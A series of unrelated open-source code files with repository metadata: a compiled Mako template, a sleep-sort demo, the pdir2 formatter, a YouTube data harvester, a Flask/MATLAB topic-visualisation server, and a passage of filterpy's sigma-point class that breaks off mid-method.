__M_writer(u' <link href="/assets/css/rst.css" rel="stylesheet" type="text/css">\n <link href="/assets/css/code.css" rel="stylesheet" type="text/css">\n <link href="/assets/css/theme.css" rel="stylesheet" type="text/css"/>\n')
# SOURCE LINE 20
if has_custom_css:
# SOURCE LINE 21
__M_writer(u' <link href="/assets/css/custom.css" rel="stylesheet" type="text/css">\n')
# SOURCE LINE 24
__M_writer(u' <!--[if lt IE 9]>\n <script src="http://html5shim.googlecode.com/svn/trunk/html5.js" type="text/javascript"></script>\n <![endif]-->\n')
# SOURCE LINE 27
if rss_link:
# SOURCE LINE 28
__M_writer(u' ')
__M_writer(unicode(rss_link))
__M_writer(u'\n')
# SOURCE LINE 29
else:
# SOURCE LINE 30
if len(translations) > 1:
# SOURCE LINE 31
for language in translations:
# SOURCE LINE 32
__M_writer(u' <link rel="alternate" type="application/rss+xml" title="RSS (')
__M_writer(unicode(language))
__M_writer(u')" href="')
__M_writer(unicode(_link('rss', None, language)))
__M_writer(u'">\n')
# SOURCE LINE 34
else:
# SOURCE LINE 35
__M_writer(u' <link rel="alternate" type="application/rss+xml" title="RSS" href="')
__M_writer(unicode(_link('rss', None)))
__M_writer(u'">\n')
# SOURCE LINE 38
if favicons:
# SOURCE LINE 39
for name, file, size in favicons:
# SOURCE LINE 40
__M_writer(u' <link rel="')
__M_writer(unicode(name))
__M_writer(u'" href="')
__M_writer(unicode(file))
__M_writer(u'" sizes="')
__M_writer(unicode(size))
__M_writer(u'"/>\n')
# SOURCE LINE 43
if comment_system == 'facebook':
# SOURCE LINE 44
__M_writer(u' <meta property="fb:app_id" content="')
__M_writer(unicode(comment_system_id))
__M_writer(u'">\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_html_translations(context):
__M_caller = context.caller_stack._push_frame()
try:
lang = context.get('lang', UNDEFINED)
messages = context.get('messages', UNDEFINED)
translations = context.get('translations', UNDEFINED)
_link = context.get('_link', UNDEFINED)
__M_writer = context.writer()
# SOURCE LINE 84
__M_writer(u'\n')
# SOURCE LINE 85
for langname in translations.keys():
# SOURCE LINE 86
if langname != lang:
# SOURCE LINE 87
__M_writer(u' <a href="')
__M_writer(unicode(_link("index", None, langname)))
__M_writer(u'">')
__M_writer(unicode(messages("LANGUAGE", langname)))
__M_writer(u'</a>\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_html_navigation_links(context):
__M_caller = context.caller_stack._push_frame()
try:
lang = context.get('lang', UNDEFINED)
permalink = context.get('permalink', UNDEFINED)
tuple = context.get('tuple', UNDEFINED)
navigation_links = context.get('navigation_links', UNDEFINED)
rel_link = context.get('rel_link', UNDEFINED)
isinstance = context.get('isinstance', UNDEFINED)
__M_writer = context.writer()
# SOURCE LINE 60
__M_writer(u'\n')
# SOURCE LINE 61
for url, text in navigation_links[lang]:
# SOURCE LINE 62
if isinstance(url, tuple):
# SOURCE LINE 63
__M_writer(u' <li> ')
__M_writer(unicode(text))
__M_writer(u'\n <ul>\n')
# SOURCE LINE 65
for suburl, text in url:
# SOURCE LINE 66
if rel_link(permalink, suburl) == "#":
# SOURCE LINE 67
__M_writer(u' <li class="active"><a href="')
__M_writer(unicode(suburl))
__M_writer(u'">')
__M_writer(unicode(text))
__M_writer(u'</a>\n')
# SOURCE LINE 68
else:
# SOURCE LINE 69
__M_writer(u' <li><a href="')
__M_writer(unicode(suburl))
__M_writer(u'">')
__M_writer(unicode(text))
__M_writer(u'</a>\n')
# SOURCE LINE 72
__M_writer(u' </ul>\n')
# SOURCE LINE 73
else:
# SOURCE LINE 74
if rel_link(permalink, url) == "#":
# SOURCE LINE 75
__M_writer(u' <li class="active"><a href="')
__M_writer(unicode(url))
__M_writer(u'">')
__M_writer(unicode(text))
__M_writer(u'</a>\n')
# SOURCE LINE 76
else:
# SOURCE LINE 77
__M_writer(u' <li><a href="')
__M_writer(unicode(url))
__M_writer(u'">')
__M_writer(unicode(text))
__M_writer(u'</a>\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_html_social(context):
__M_caller = context.caller_stack._push_frame()
try:
social_buttons_code = context.get('social_buttons_code', UNDEFINED)
__M_writer = context.writer()
# SOURCE LINE 51
__M_writer(u'\n\t')
# SOURCE LINE 52
__M_writer(unicode(social_buttons_code))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_late_load_js(context):
__M_caller = context.caller_stack._push_frame()
try:
__M_writer = context.writer()
# SOURCE LINE 48
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_html_sidebar_links(context):
__M_caller = context.caller_stack._push_frame()
try:
def html_navigation_links():
return render_html_navigation_links(context)
__M_writer = context.writer()
# SOURCE LINE 56
__M_writer(u'\n ')
# SOURCE LINE 57
__M_writer(unicode(html_navigation_links()))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
|
{
"content_hash": "7d520d6451fb0baa6194ecd712b86d29",
"timestamp": "",
"source": "github",
"line_count": 272,
"max_line_length": 259,
"avg_line_length": 38.88970588235294,
"alnum_prop": 0.4905464170920779,
"repo_name": "apjd/wwwapjd",
"id": "0599313cffbb1b35de5004a47331236d1c254b88",
"size": "10603",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cache/.mako.tmp/base_helper.tmpl.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "26187"
},
{
"name": "JavaScript",
"bytes": "1650"
},
{
"name": "Python",
"bytes": "23065"
}
],
"symlink_target": ""
}
|
"""
Sleep sort is a proof of concept sorting algorithm that creates threads for
each number in the sorting queue and sleeps for the amount of time before
giving the result.
It has no practical usage and doesn't works for negative numbers. Also for
very close positive numbers, results are not guaranteed to be consistent.
"""
try:
import queue
except ImportError:
import Queue as queue
import threading
import time
def sleeper(number, sorted_numbers):
"""
Worker function for sleep sort's thread.
:param number: Number for the thread
:param sorted_numbers: Queue which contains the sorted numbers
"""
time.sleep(number)
sorted_numbers.put(number)
def sleep_sort(numbers, reverse=False):
"""
Sorts the numbers using sleep sort algorithm.
:param numbers: Iterable object containing numbers
:param reverse: Whether results need to be reverse
:returns: A generator with sorted numbers
"""
threads = []
sorted_numbers = queue.LifoQueue() if reverse else queue.Queue()
for number in numbers:
thread = threading.Thread(target=sleeper,
args=(number, sorted_numbers))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
while not sorted_numbers.empty():
yield sorted_numbers.get()
def main():
numbers = [2, 3, 4, 1]
print("Ascending order: ")
for number in sleep_sort(numbers):
print(number)
print("Descending order: ")
for number in sleep_sort(numbers, reverse=True):
print(number)
if __name__ == '__main__':
main()
|
{
"content_hash": "0ef6662d3326616878395daf35eebd27",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 75,
"avg_line_length": 28.17241379310345,
"alnum_prop": 0.6701346389228886,
"repo_name": "Enether/algos",
"id": "55c44e4d082abd9330fcb40f1effa0d21b504909",
"size": "1634",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "sleep_sort/sleep_sort.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "29004"
},
{
"name": "C#",
"bytes": "2709"
},
{
"name": "C++",
"bytes": "9335"
},
{
"name": "Go",
"bytes": "13835"
},
{
"name": "Java",
"bytes": "63193"
},
{
"name": "JavaScript",
"bytes": "22815"
},
{
"name": "Python",
"bytes": "165580"
},
{
"name": "Shell",
"bytes": "2197"
}
],
"symlink_target": ""
}
|
"""
Defines how attr is organized and displayed.
"""
from collections import namedtuple
from collections.abc import Iterable
from itertools import groupby
from typing import List
from . import api # noqa: F401, '.api' imported but unused
from .attr_category import AttrCategory
from .configuration import attribute_color, category_color, comma, doc_color, slot_tag
def format_pattrs(pattrs: List['api.PrettyAttribute']) -> str:
"""Generates repr string given a list of pattrs."""
pattrs.sort(
key=lambda x: (
_FORMATTER[x.display_group].display_index,
x.display_group,
x.name,
)
)
output = [
_FORMATTER[display_group].formatter(display_group, grouped_pattrs)
for display_group, grouped_pattrs in groupby(pattrs, lambda x: x.display_group)
]
return '\n'.join(output)
def _format_single_line(category: AttrCategory, pattrs: Iterable) -> str:
category_line = category_color.wrap_text(str(category) + ':')
output_text = []
for pattr in pattrs:
single_attr = attribute_color.wrap_text(pattr.name)
output_text.append(single_attr + slot_tag if pattr.slotted else single_attr)
return '{0}\n {1}'.format(category_line, comma.join(output_text))
def _format_multiline_with_doc(category: AttrCategory, pattrs: Iterable) -> str:
category_line = category_color.wrap_text(str(category) + ':') + '\n'
output_text = []
for pattr in pattrs:
name = attribute_color.wrap_text(pattr.name)
if pattr.slotted:
name += slot_tag
name += attribute_color.wrap_text(': ')
doc = doc_color.wrap_text(pattr.doc)
output_text.append(' {0}{1}'.format(name, doc))
return category_line + '\n'.join(output_text)
def _format_descriptor(category: AttrCategory, attrs: Iterable) -> str:
return _format_multiline_with_doc(category, attrs)
_AttributeGroupFormatter = namedtuple(
'_AttributeGroupFormatter', ['display_index', 'formatter']
)
_single_line = _AttributeGroupFormatter(display_index=0, formatter=_format_single_line)
_descriptor = _AttributeGroupFormatter(display_index=1, formatter=_format_descriptor)
_multiline_with_doc = _AttributeGroupFormatter(
display_index=2, formatter=_format_multiline_with_doc
)
_FORMATTER = {
AttrCategory.SLOT: _single_line,
AttrCategory.FUNCTION: _multiline_with_doc,
AttrCategory.CLASS: _multiline_with_doc,
AttrCategory.EXCEPTION: _multiline_with_doc,
AttrCategory.PROPERTY: _single_line,
# Attribute
AttrCategory.MODULE_ATTRIBUTE: _single_line,
AttrCategory.SPECIAL_ATTRIBUTE: _single_line,
# Function
AttrCategory.MAGIC: _multiline_with_doc,
AttrCategory.ARITHMETIC: _single_line,
AttrCategory.ITER: _single_line,
AttrCategory.CONTEXT_MANAGER: _single_line,
AttrCategory.OBJECT_CUSTOMIZATION: _single_line,
AttrCategory.RICH_COMPARISON: _single_line,
AttrCategory.ATTRIBUTE_ACCESS: _single_line,
AttrCategory.DESCRIPTOR: _descriptor,
AttrCategory.DESCRIPTOR_CLASS: _single_line,
AttrCategory.STATIC_METHOD: _descriptor,
AttrCategory.CLASS_CUSTOMIZATION: _single_line,
AttrCategory.CONTAINER: _single_line,
AttrCategory.COROUTINE: _single_line,
AttrCategory.COPY: _single_line,
AttrCategory.PICKLE: _single_line,
AttrCategory.ABSTRACT_CLASS: _single_line,
AttrCategory.PATTERN_MATCHING: _single_line,
AttrCategory.TYPING: _single_line,
}
|
{
"content_hash": "50bf974183b64990527107e6c9fd0ae8",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 87,
"avg_line_length": 36.55789473684211,
"alnum_prop": 0.7002591419522027,
"repo_name": "laike9m/pdir2",
"id": "1ba574f7befdd6cb76899d4bf3ee437a76dbfd47",
"size": "3473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pdir/format.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "537"
},
{
"name": "Python",
"bytes": "67568"
}
],
"symlink_target": ""
}
|
from datetime import timedelta
import resource
import time
import urllib
from django.core.exceptions import ObjectDoesNotExist
from snh.models.youtubemodel import *
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
import snhlogger
logger = snhlogger.init_logger(__name__, "youtube.log")
def run_youtube_harvester():
harvester_list = YoutubeHarvester.objects.all()
for harvester in harvester_list:
logger.info(u"The harvester %s is %s" %
(unicode(harvester),
"active" if harvester.is_active else "inactive"))
if harvester.is_active:
run_harvester_v1(harvester)
def sleeper(retry_count):
retry_delay = 1
wait_delay = retry_count*retry_delay
wait_delay = 10 if wait_delay > 10 else wait_delay
time.sleep(wait_delay)
def get_timedelta(dm_time):
ts = datetime.strptime(dm_time,'%Y-%m-%dT%H:%M:%S+0000')
return (datetime.utcnow() - ts).days
def get_existing_user(param):
user = None
try:
user = YTUser.objects.get(**param)
except MultipleObjectsReturned:
user = YTUser.objects.filter(**param)[0]
logger.warning(u"Duplicated user in DB! %s, %s" % (user, user.fid))
except ObjectDoesNotExist:
pass
return user
def update_user(harvester, userid):
snh_user = None
try:
uniuserid = urllib.urlencode({"k":userid.encode('utf-8')}).split("=")[1:][0]
ytuser = harvester.api_call("GetYouTubeUserEntry",{"username":uniuserid})
split_uri = ytuser.id.text.split("/")
fid = split_uri[len(split_uri)-1]
snh_user = get_existing_user({"fid__exact":fid})
if not snh_user:
snh_user = get_existing_user({"username__exact":userid})
if not snh_user:
snh_user = YTUser(
fid=fid,
username=userid,
)
snh_user.save()
logger.info(u"New user created in status_from_search! %s", snh_user)
snh_user.update_from_youtube(ytuser)
except gdata.service.RequestError, e:
msg = u"RequestError on user %s. Trying to update anyway" % (userid)
logger.info(msg)
if e[0]["status"] == 403 or e[0]["status"] == 400:
snh_user = get_existing_user({"username__exact":userid})
if not snh_user:
snh_user = YTUser(
username=userid,
)
snh_user.save()
logger.info(u"New user created in status_from_search! %s", snh_user)
else:
msg = u"RequestError on user %s!!! Force update failed!!!" % (userid)
logger.exception(msg)
except:
msg = u"Cannot update user %s" % (userid)
logger.exception(msg)
return snh_user
def update_users(harvester):
all_users = harvester.ytusers_to_harvest.all()
for snhuser in all_users:
if not snhuser.error_triggered:
uid = snhuser.fid if snhuser.fid else snhuser.username
update_user(harvester, uid)
else:
logger.info(u"Skipping user update: %s(%s) because user has triggered the error flag." % (unicode(snhuser), snhuser.fid if snhuser.fid else "0"))
usage = resource.getrusage(resource.RUSAGE_SELF)
logger.info(u"User harvest completed %s Mem:%s MB" % (harvester,unicode(getattr(usage, "ru_maxrss")/(1024.0))))
def update_video(snhuser, ytvideo):
split_uri = ytvideo.id.text.split("/")
fid = split_uri[len(split_uri)-1]
snhvideo = None
try:
try:
snhvideo = YTVideo.objects.get(fid__exact=fid)
except ObjectDoesNotExist:
snhvideo = YTVideo(fid=fid, user=snhuser)
snhvideo.save()
snhvideo.update_from_youtube(snhuser, ytvideo)
except:
msg = u"Cannot update video %s" % (unicode(ytvideo.id.text,'UTF-8'))
logger.exception(msg)
return snhvideo
def update_comment(harvester, snhvideo, ytcomment):
author_name = ytcomment.author[0].name.text
snhuser = update_user(harvester, author_name)
split_uri = ytcomment.id.text.split("/")
fid = split_uri[len(split_uri)-1]
try:
try:
snhcomment = YTComment.objects.get(fid__exact=fid)
except ObjectDoesNotExist:
snhcomment = YTComment(fid=fid, video=snhvideo)
snhcomment.save()
snhcomment.update_from_youtube(snhvideo, snhuser, ytcomment)
except:
msg = u"Cannot update comment %s" % (unicode(ytcomment.id.text,'UTF-8'))
logger.exception(msg)
usage = resource.getrusage(resource.RUSAGE_SELF)
logger.debug(u"Commment updated: comid:%s vidid:%s %s Mem:%s MB" % (snhcomment.fid,snhvideo.fid, harvester,unicode(getattr(usage, "ru_maxrss")/(1024.0))))
return snhcomment
def update_all_comment_helper(harvester, snhvideo, comment_list):
for comment in comment_list.entry:
update_comment(harvester, snhvideo, comment)
get_next_comment_uri = comment_list.GetNextLink().href if comment_list.GetNextLink() else None
return get_next_comment_uri
def update_all_comment(harvester,snhvideo):
comment_list = harvester.api_call("GetYouTubeVideoCommentFeed",{"video_id":snhvideo.fid})
get_next_comment_uri = update_all_comment_helper(harvester, snhvideo, comment_list)
while get_next_comment_uri:
comment_list = harvester.api_call("GetYouTubeVideoCommentFeed",{"uri":get_next_comment_uri})
get_next_comment_uri = update_all_comment_helper(harvester, snhvideo, comment_list)
usage = resource.getrusage(resource.RUSAGE_SELF)
logger.info(u"Comment harvest completed for this video: %s %s Mem:%s MB" % (snhvideo.fid, harvester,unicode(getattr(usage, "ru_maxrss")/(1024.0))))
def update_all_videos(harvester):
all_users = harvester.ytusers_to_harvest.all()
for snhuser in all_users:
out_of_window = False
if not snhuser.error_triggered:
logger.info(u"Will update user: %s(%s)" % (unicode(snhuser), snhuser.fid if snhuser.fid else "0"))
get_vid_url = 'http://gdata.youtube.com/feeds/api/users/%s/uploads?' % snhuser.username
while get_vid_url and not out_of_window:
video_list = harvester.api_call("GetYouTubeVideoFeed",{"uri":get_vid_url})
for video in video_list.entry:
published = datetime.strptime(video.published.text,'%Y-%m-%dT%H:%M:%S.000Z')
if published < harvester.harvest_window_to:
snhvideo = update_video(snhuser, video)
update_all_comment(harvester, snhvideo)
if published < harvester.harvest_window_from:
out_of_window = True
break
if not out_of_window:
get_vid_url = video_list.GetNextLink().href if video_list.GetNextLink() else None
else:
logger.info(u"Skipping user update: %s(%s) because user has triggered the error flag." % (unicode(snhuser), snhuser.fid if snhuser.fid else "0"))
usage = resource.getrusage(resource.RUSAGE_SELF)
logger.info(u"Video harvest completed %s Mem:%s MB" % (harvester,unicode(getattr(usage, "ru_maxrss")/(1024.0))))
def run_harvester_v1(harvester):
harvester.start_new_harvest()
try:
start = time.time()
update_users(harvester)
update_all_videos(harvester)
logger.info(u"Results computation complete in %ss" % (time.time() - start))
except:
logger.exception(u"EXCEPTION: %s" % harvester)
finally:
usage = resource.getrusage(resource.RUSAGE_SELF)
harvester.end_current_harvest()
logger.info(u"End: %s Stats:%s Mem:%s MB" % (harvester,unicode(harvester.get_stats()),unicode(getattr(usage, "ru_maxrss")/(1024.0))))
|
{
"content_hash": "0d8aec3f068fe1b8d1dc5226d142e3e6",
"timestamp": "",
"source": "github",
"line_count": 200,
"max_line_length": 158,
"avg_line_length": 39.985,
"alnum_prop": 0.6179817431536826,
"repo_name": "pylanglois/Social-Network-Harvester",
"id": "515fbac1c9421ae450872853790edcc0060756f8",
"size": "8013",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SocialNetworkHarvester/snh/management/commands/cronharvester/youtubech.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "31592"
},
{
"name": "CSS",
"bytes": "31414"
},
{
"name": "JavaScript",
"bytes": "517851"
},
{
"name": "Python",
"bytes": "252408"
},
{
"name": "Shell",
"bytes": "366"
}
],
"symlink_target": ""
}
|
from flask import Flask, request, g, render_template
from flask.ext.triangle import Triangle
from flask.ext.socketio import SocketIO, emit
from scipy import sparse, io
import numpy as np
from matlab import engine
import os, json, time
from flask.ext.cors import CORS
# Configuration
app = Flask(__name__, static_path='/static')
Triangle(app)
CORS(app)
app.config['CORS_HEADERS'] = 'Content-Type'
app.config['DEBUG'] = True
app.config.from_object(__name__)
app.config['PROFILE'] = True
# app.wsgi_app = ProfilerMiddleware(app.wsgi_app, restrictions=[10])
socketio = SocketIO(app)
# @app.after_request
# def after_request(response):
# response.headers.add('Access-Control-Allow-Origin', '*')
# response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
# response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE')
# return response
def supervisedTSNE(distanceMatrix, cl_idx, sameTopicWeight=0.9, differentTopicWeight=1.1):
n = distanceMatrix.shape[0]
for i in xrange(n):
i_topic = cl_idx[i]
for j in xrange(n):
if i==j:
continue
elif i_topic==cl_idx[j]:
distanceMatrix[i,j]*=sameTopicWeight
else:
distanceMatrix[i,j]*=differentTopicWeight
distanceMatrix[i,:] /= distanceMatrix[i,:].max()
return np.round(distanceMatrix,decimals=3)
def before__first_request_():
global eng
global mappedX
global cl_idx
global Wtopk
global voca
global distanceMatrix
global distanceMatrix_main
tic = time.time()
print 'Starting matlab - ',
eng = engine.start_matlab()
eng.cd(os.path.dirname(os.getcwd()))
print "%.4f" % (time.time()-tic)
tic = time.time()
#dataset
#vis=0
#cnn=1
#nyt=2
# dataset=2
# if dataset ==0:
#eng.main_topic(nargout=0)
#distanceMatrix = io.loadmat('./../Visdata.mat')['DD']
# elif dataset ==1:
# eng.main_cnn(nargout=0)
# distanceMatrix = io.loadmat('./../result2.mat')['DD']
# else:
eng.main_nyt(nargout=0)
distanceMatrix = io.loadmat('./../nyt.mat')['DD']
mappedX = eng.workspace['mappedX']
cl_idx = eng.workspace['cl_idx']
Wtopk_idx = eng.workspace['Wtopk_idx']
voca = eng.workspace['dict']
print "%.4f" % (time.time()-tic)
tic = time.time()
print "Calculate data - ",
Wtopk = []
for idxArray in Wtopk_idx:
tempArray = []
for idx in idxArray:
tempArray.append(voca[int(idx)-1])
Wtopk.append(tempArray)
cl_idx = cl_idx[0]
# cl_idx = cl_idx
# distanceMatrix = distanceMatrix
# cl_idx = cl_idx
# distanceMatrix = distanceMatrix
sameTopicWeight = 0.8
differentTopicWeight = 1.2
distanceMatrix_main = supervisedTSNE(distanceMatrix, cl_idx,
sameTopicWeight=sameTopicWeight, differentTopicWeight=differentTopicWeight)
print "%.4f" % (time.time()-tic)
distanceMatrix_main = distanceMatrix_main.tolist()
@app.teardown_request
def teardown_request(exception):
pass
@app.route('/get_subTopic')
def get_subTopic():
global eng
global voca
global distanceMatrix
idx = json.loads(request.args.get('idx'))
eng.workspace['idx'] = idx
eng.sub_topic(nargout=0)
mappedXP_sub = eng.workspace['mappedX_sub']
cl_idx_sub = eng.workspace['cl_idx_sub']
Wtopk_idx_sub = eng.workspace['Wtopk_idx_sub']
k_sub = eng.workspace['k_sub'] # number of topics that will be shown
idx = [i-1 for i in idx]
Wtopk_sub = []
for idxArray in Wtopk_idx_sub:
tempArray = []
for topicIdx in idxArray:
tempArray.append(voca[int(topicIdx)-1])
Wtopk_sub.append(tempArray)
cl_idx_sub = cl_idx_sub[0]
cl_idx_sub = np.array(cl_idx_sub).tolist()
distanceMatrix_sub = distanceMatrix[idx,:][:,idx]
sameTopicWeight = 0.8
differentTopicWeight = 1.2
distanceMatrix_sub = supervisedTSNE(distanceMatrix_sub, cl_idx_sub,
sameTopicWeight=sameTopicWeight, differentTopicWeight=differentTopicWeight)
distanceMatrix_sub = distanceMatrix_sub.tolist()
return json.dumps({'distanceMatrix':distanceMatrix_sub, 'cl_idx_sub':cl_idx_sub, 'Wtopk_sub':Wtopk_sub})
###### socket test code
@socketio.on('connect', namespace='/subtopic')
def connect():
print "connected"
@socketio.on('disconnect', namespace='/subtopic')
def disconnect():
print "disconnected"
@socketio.on('get_subTopic', namespace='/subtopic')
def get_subTopic_(message):
global eng
global voca
global distanceMatrix
idx = message['idx']
socketId = message['socketId']
print "get Request - %s" % socketId
sameTopicWeight = 0.8
differentTopicWeight = 1.2
eng.workspace['idx'] = idx
print "before subtopic"
eng.sub_topic(nargout=0)
print "after subtopic"
k_sub = int(eng.workspace['k_sub'])
sub_k = int(eng.workspace['sub_k'])
idx = [i-1 for i in idx]
distanceMatrix_sub = distanceMatrix[idx,:][:,idx]
print "before iteration"
if k_sub-sub_k==0:
iterNum = 1
else:
iterNum = k_sub-sub_k
print iterNum
for i in xrange(1,iterNum+1):
print i
eng.workspace['i'] = i
eng.sub_topic_ith_Iter(nargout=0)
cl_idx_sub = eng.workspace['cl_idx_sub']
Wtopk_idx_sub = eng.workspace['Wtopk_idx_sub']
Wtopk_sub = []
for idxArray in Wtopk_idx_sub:
tempArray = []
for topicIdx in idxArray:
tempArray.append(voca[int(topicIdx)-1])
Wtopk_sub.append(tempArray)
cl_idx_sub = cl_idx_sub[0]
cl_idx_sub = np.array(cl_idx_sub).tolist()
distanceMatrix_sub_ = supervisedTSNE(distanceMatrix_sub, cl_idx_sub,
sameTopicWeight=sameTopicWeight, differentTopicWeight=differentTopicWeight)
distanceMatrix_sub_ = distanceMatrix_sub.tolist()
emit('result data'+socketId, {'distanceMatrix':distanceMatrix_sub_, 'cl_idx_sub':cl_idx_sub, 'Wtopk_sub':Wtopk_sub})
time.sleep(2)
return 1
#########################
# not used in gather plot
@app.route('/get_subTopic_tsne')
def get_subTopic_tsne():
global eng
global voca
idx = json.loads(request.args.get('idx'))
eng.sub_topic(nargout=0)
mappedXP_sub = eng.workspace['mappedX_sub']
cl_idx_sub = eng.workspace['cl_idx_sub']
Wtopk_idx_sub = eng.workspace['Wtopk_idx_sub']
k_sub = eng.workspace['k_sub'] # number of topics that will be shown
print mappedX_sub
Wtopk_sub = []
for idxArray in Wtopk_idx_sub:
tempArray = []
for idx in idxArray:
tempArray.append(voca[int(idx)-1])
Wtopk_sub.append(tempArray)
cl_idx_sub = cl_idx_sub[0]
mappedX_sub = np.array(mappedX_sub).tolist()
cl_idx_sub = np.array(cl_idx_sub).tolist()
return json.dumps({'mappedX_sub':mappedX_sub, 'cl_idx_sub':cl_idx_sub, 'Wtopk_sub':Wtopk_sub})
# keyword 입력받음
@app.route('/')
def form():
global cl_idx
global Wtopk
global distanceMatrix_main
return render_template('tsne.html', cl_idx=cl_idx, Wtopk= Wtopk, distanceMatrix=distanceMatrix_main)
# Execute the main program
if __name__ == '__main__':
before__first_request_()
socketio.run(app,host='0.0.0.0',port=5004, debug=True)
|
{
"content_hash": "beb2b071bb10a01dc6d3a6eda6ef1099",
"timestamp": "",
"source": "github",
"line_count": 279,
"max_line_length": 118,
"avg_line_length": 24.010752688172044,
"alnum_prop": 0.6989102851171817,
"repo_name": "intuinno/topiclens",
"id": "e852ae9eebebddf6a211949d70f4259ba3bb3335",
"size": "6791",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/init.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "194400"
},
{
"name": "HTML",
"bytes": "3258288"
},
{
"name": "JavaScript",
"bytes": "4067325"
},
{
"name": "Jupyter Notebook",
"bytes": "64001"
},
{
"name": "M",
"bytes": "1247"
},
{
"name": "Matlab",
"bytes": "322570"
},
{
"name": "PHP",
"bytes": "404"
},
{
"name": "Python",
"bytes": "49226"
},
{
"name": "Ruby",
"bytes": "497"
}
],
"symlink_target": ""
}
|
"""Copyright 2015 Roger R Labbe Jr.
FilterPy library.
http://github.com/rlabbe/filterpy
Documentation at:
https://filterpy.readthedocs.org
Supporting book at:
https://github.com/rlabbe/Kalman-and-Bayesian-Filters-in-Python
This is licensed under an MIT license. See the readme.MD file
for more information.
"""
from __future__ import division
import numpy as np
from scipy.linalg import cholesky
from filterpy.common import pretty_str
class MerweScaledSigmaPoints(object):
"""
Generates sigma points and weights according to Van der Merwe's
2004 dissertation[1] for the UnscentedKalmanFilter class.. It
parametizes the sigma points using alpha, beta, kappa terms, and
is the version seen in most publications.
Unless you know better, this should be your default choice.
Parameters
----------
n : int
Dimensionality of the state. 2n+1 weights will be generated.
alpha : float
Determins the spread of the sigma points around the mean.
Usually a small positive value (1e-3) according to [3].
beta : float
Incorporates prior knowledge of the distribution of the mean. For
Gaussian x beta=2 is optimal, according to [3].
kappa : float, default=0.0
Secondary scaling parameter usually set to 0 according to [4],
or to 3-n according to [5].
sqrt_method : function(ndarray), default=scipy.linalg.cholesky
Defines how we compute the square root of a matrix, which has
no unique answer. Cholesky is the default choice due to its
speed. Typically your alternative choice will be
scipy.linalg.sqrtm. Different choices affect how the sigma points
are arranged relative to the eigenvectors of the covariance matrix.
Usually this will not matter to you; if so the default cholesky()
yields maximal performance. As of van der Merwe's dissertation of
2004 [6] this was not a well reseached area so I have no advice
to give you.
If your method returns a triangular matrix it must be upper
triangular. Do not use numpy.linalg.cholesky - for historical
reasons it returns a lower triangular matrix. The SciPy version
does the right thing.
subtract : callable (x, y), optional
Function that computes the difference between x and y.
You will have to supply this if your state variable cannot support
subtraction, such as angles (359-1 degreees is 2, not 358). x and y
are state vectors, not scalars.
Attributes
----------
Wm : np.array
weight for each sigma point for the mean
Wc : np.array
weight for each sigma point for the covariance
Examples
--------
See my book Kalman and Bayesian Filters in Python
https://github.com/rlabbe/Kalman-and-Bayesian-Filters-in-Python
References
----------
.. [1] R. Van der Merwe "Sigma-Point Kalman Filters for Probabilitic
Inference in Dynamic State-Space Models" (Doctoral dissertation)
"""
def __init__(self, n, alpha, beta, kappa, sqrt_method=None, subtract=None):
#pylint: disable=too-many-arguments
self.n = n
self.alpha = alpha
self.beta = beta
self.kappa = kappa
if sqrt_method is None:
self.sqrt = cholesky
else:
self.sqrt = sqrt_method
if subtract is None:
self.subtract = np.subtract
else:
self.subtract = subtract
self._compute_weights()
def num_sigmas(self):
""" Number of sigma points for each variable in the state x"""
return 2*self.n + 1
def sigma_points(self, x, P):
""" Computes the sigma points for an unscented Kalman filter
given the mean (x) and covariance(P) of the filter.
Returns tuple of the sigma points and weights.
Works with both scalar and array inputs:
sigma_points (5, 9, 2) # mean 5, covariance 9
sigma_points ([5, 2], 9*eye(2), 2) # means 5 and 2, covariance 9I
Parameters
----------
x : An array-like object of the means of length n
Can be a scalar if 1D.
examples: 1, [1,2], np.array([1,2])
P : scalar, or np.array
Covariance of the filter. If scalar, is treated as eye(n)*P.
Returns
-------
sigmas : np.array, of size (2n+1, n)
Two dimensional array of sigma points. Each column contains all of
the sigmas for one dimension in the problem space.
Ordered by Xi_0, Xi_{1..n}, Xi_{n+1..2n}
"""
if self.n != np.size(x):
raise ValueError("expected size(x) {}, but size is {}".format(
self.n, np.size(x)))
n = self.n
if np.isscalar(x):
x = np.asarray([x])
if np.isscalar(P):
P = np.eye(n)*P
else:
P = np.atleast_2d(P)
lambda_ = self.alpha**2 * (n + self.kappa) - n
U = self.sqrt((lambda_ + n)*P)
sigmas = np.zeros((2*n+1, n))
sigmas[0] = x
for k in range(n):
# pylint: disable=bad-whitespace
sigmas[k+1] = self.subtract(x, -U[k])
sigmas[n+k+1] = self.subtract(x, U[k])
return sigmas
def _compute_weights(self):
""" Computes the weights for the scaled unscented Kalman filter.
"""
n = self.n
lambda_ = self.alpha**2 * (n +self.kappa) - n
c = .5 / (n + lambda_)
self.Wc = np.full(2*n + 1, c)
self.Wm = np.full(2*n + 1, c)
self.Wc[0] = lambda_ / (n + lambda_) + (1 - self.alpha**2 + self.beta)
self.Wm[0] = lambda_ / (n + lambda_)
def __repr__(self):
return '\n'.join([
'MerweScaledSigmaPoints object',
pretty_str('n', self.n),
pretty_str('alpha', self.alpha),
pretty_str('beta', self.beta),
